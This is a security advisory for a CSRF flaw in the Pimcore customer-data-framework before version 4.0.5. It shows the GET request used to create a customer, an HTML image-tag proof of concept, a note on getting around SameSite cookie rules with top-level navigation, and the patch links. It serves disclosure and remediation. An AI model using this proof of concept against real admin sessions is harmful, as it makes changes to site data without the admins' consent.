Headline
CVE-2023-49076: CSRF leading to creation of a new customer
Customer-data-framework allows management of customer data within Pimcore. There are no tokens or headers to prevent CSRF attacks from occurring, therefore an attacker could abuse this vulnerability to create new customers. This issue has been patched in version 4.0.5.
Package
composer pimcore/customer-data-framework (Composer)
Affected versions
< 4.0.5
Impact
After navigating to the Customers section of the Pimcore admin application and clicking New Customer, the following HTTP GET request is submitted:
```http
GET /admin/customermanagementframework/customers/new HTTP/1.1
Host: demo.pimcore.fun
Cookie: PHPSESSID=7a4c4ceddbbb3809dab7852fa60713c6; _pc_vis=ce525cb79e817973; _pc_ses=1695307137653
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
```
As the request shows, creating a customer is a state-changing action performed with a plain GET and authenticated solely by the session cookie: there is no anti-CSRF token, and no header is required by the server (the X-Requested-With header is added by the admin UI's XMLHttpRequest but is not enforced, as the image-based proof of concept below confirms). An attacker who gets a logged-in admin to load a page they control can therefore create new customers in the admin's session.
Proof of Concept
```html
<!-- PoC.js -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <img src="https://demo.pimcore.fun/admin/customermanagementframework/customers/new">
</body>
</html>
```

When an authenticated admin loads this page from an attacker-controlled origin, the browser fetches the image URL and, if the session cookie is permitted on cross-site requests, attaches it. Note that an image load is a cross-site subresource request: browsers that treat cookies lacking a SameSite attribute as Lax (Chromium-based browsers do so by default) omit the cookie from the `<img>` fetch, but still send it on a top-level GET navigation to the same URL (a link or a `window.location` assignment), which triggers the action just the same because the endpoint accepts GET.
A successful HTTP response is received:

```http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 26
X-Header: <value>

{"success":true,"id":1191}
```
Impact: a new customer record is created on behalf of the logged-in admin without their knowledge or consent, compromising the integrity of the customer data.
Patches
Apply https://github.com/pimcore/customer-data-framework/commit/ef7414415cfa64189b8433eff0aa2a9b537a89f7.patch manually.
Workarounds
Update to version 4.0.5, or apply the patch manually: https://github.com/pimcore/customer-data-framework/commit/ef7414415cfa64189b8433eff0aa2a9b537a89f7.patch